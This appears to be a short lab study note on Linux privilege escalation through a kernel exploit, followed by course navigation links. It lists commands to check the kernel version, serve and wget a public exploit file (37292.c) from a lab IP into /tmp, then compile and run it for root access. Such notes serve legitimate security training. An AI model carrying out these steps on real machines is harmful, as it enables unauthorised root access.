3. Linux Privilege Escalation: Kernal Exploit
uname -a
python -m http.server 8000 -> python simple server
cd /tmp
use wget http://10.10.188.202:8000/37292.c
run C
gcc 37292.c -o my_program
./my_programPrevious2. Linux Privilege Escalation Automated Enumeration ToolsNext4. Linux Privilege Escalation: Sudo
Last updated